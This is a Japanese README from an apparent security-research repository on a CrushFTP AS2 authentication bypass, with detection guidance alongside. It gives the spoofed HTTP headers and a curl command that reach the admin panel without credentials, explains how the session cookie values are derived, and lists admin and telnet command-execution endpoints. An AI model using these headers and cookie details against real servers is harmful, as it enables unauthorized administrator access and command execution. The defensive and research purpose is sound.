
CrushFTP AS2認証バイパスに関する研究。認証なしの管理者アクセスを可能にします。PoCスクリプト、検出ルール、技術分析を教育および防御目的で含みます。
⚠️ 重要: この脆弱性は、2025年11月時点でCrushFTPにより修正済みです。この研究は教育および防御目的でのみ公開されています。
📝 注意: この研究はCVE-2025-54309と類似した脆弱性パターンに基づいています。正確なCVE番号は異なる可能性があります。これは管理されたホームラボ環境で実施された独立したセキュリティ研究です。
このリポジトリは、CrushFTPサーバにおける重大な認証バイパス脆弱性を文書化したものです。この脆弱性により、AS2(Applicability Statement 2)ヘッダーの操作を通じて完全な管理アクセスが可能になります。この脆弱性は認証を必要とせず、単一のHTTPリクエストで悪用可能です。
重要ポイント:
研究者: SmileyFace101 (@SmileyFace101)
CrushFTPのWebインターフェースは、AS2プロトコルヘッダーを適切に検証せずに誤って信頼します。サーバはAS2リクエストが事前認証済みであると想定し、通常の認証手順をバイパスします。
脆弱なCrushFTPバージョン(ラボで確認済み):
修正済みバージョン:
ラボ環境:
X-DMZ-Proxy: disabled
X-AS2-Version: 1.0
User-Agent: AS2Server/1.0
例(ラボ環境):
curl -H "X-DMZ-Proxy: disabled" \
-H "X-AS2-Version: 1.0" \
-H "User-Agent: AS2Server/1.0" \
"http://10.0.100.50/WebInterface/admin/index.html"
注意: 自分が所有しているか、明示的な許可を得たシステムでのみ使用してください。
悪用の過程で、セッションクッキー生成に数学的な関係があることを発見しました。これにより悪用が100%信頼できるものになります。
CrushAuth構造: [TIMESTAMP]_[SESSION_ID]
currentAuth = SESSION_IDの最後の4文字
c2fパラメータ = currentAuthの値と同じ
✅ 完全なサーバおよびユーザ列挙
✅ ユーザアカウントの作成と変更
✅ ファイルシステムへのアクセスと参照
✅ telnetインターフェース経由のコマンド実行
✅ システム権限でのジョブスケジューリング
✅ PGP鍵と証明書へのアクセス
✅ 管理設定の変更
detection/ ディレクトリを参照:
X-DMZ-Proxy: disabled
X-AS2-Version: 1.0
User-Agent: AS2Server/1.0
/WebInterface/function/へのPOSTリクエスト# Webサーバログ
grep -E "(X-DMZ-Proxy|X-AS2-Version|AS2Server)" /var/log/nginx/access.log
# CrushFTPアプリケーションログ
grep -E "(WebInterface/admin|WebInterface/function)" crushftp.log
.
├── README.md # このファイル – 概要と使用方法
├── docs/
│ └── TECHNICAL_ANALYSIS.md # 完全な技術詳細
├── exploits/
│ ├── enhanced_session_exploit.sh # セッション管理付き完全悪用
│ ├── targeted_exploitation.sh # 高価値エンドポイントテスト
│ └── adaptive_exploitation.sh # 複数戦略アプローチ
└── detection/
├── snort_rules.txt # IDS/IPSシグネチャ(Snort)
├── suricata_rules.txt # IDS/IPSシグネチャ(Suricata)
└── log_analysis.sh # ログ分析とIOC検出
ドキュメントを読む:
ラボでテスト:
# 対象システムを所有していることを確認してください!
./exploits/enhanced_session_exploit.sh 10.0.100.50
検出を展開:
✅ 完全なAS2認証バイパスの発見と文書化
✅ 重要なセッションクッキー生成要件の特定と解決
✅ セッション管理における数学的関係のリバースエンジニアリング
✅ 二段階悪用手法の開発
✅ 100%信頼性のある悪用パターンの確立
✅ 複数のRCEベクトルの特定と分析
✅ 完全なJavaScriptソースコード分析の実施
/WebInterface/admin/index.html – メイン管理パネル/WebInterface/admin/telnet.html – telnetインターフェース/WebInterface/Jobs/index.html – ジョブ管理/WebInterface/UserManager/index.html – ユーザ管理/WebInterface/PGP/index.html – PGP鍵管理/WebInterface/function/ – 管理機能プロセッサ著者: SmileyFace101
GitHub: @SmileyFace101
研究期間: 2025年3月~7月(ホームラボ)
公開開示: 2025年12月6日
この研究は教育および防御目的のみを対象としています。
✅ 許可される使用:
❌ 禁止事項:
この研究を使用することにより、以下に同意したものとみなされます:
免責事項: 著者は不正使用について責任を負いません。許可されていないコンピュータアクセスは違法です。
MITライセンス – 詳細については LICENSE ファイルを参照してください。
最終更新日: 2025年12月6日
リスク評価: 重大 – 即時パッチ適用と緩和が必要
最終更新日: 2025年12月6日
著者: SmileyFace101
研究実施: 許可されたラボ環境で2025年3月~7月
| セキュリティ面 | 影響レベル | 説明 |
|---|
| 機密性 | 🔴 重大 | 資格情報、設定、PGP鍵、ログへの完全なアクセス |
| 完全性 | 🔴 重大 | ユーザアカウント作成、設定変更、ファイル改変 |
| 可用性 | 🟡 高 | システムコマンド実行、サービス妨害の可能性 |
| 権限昇格 | 🔴 重大 | 直接の管理者アクセス、永続的なアカウント作成 |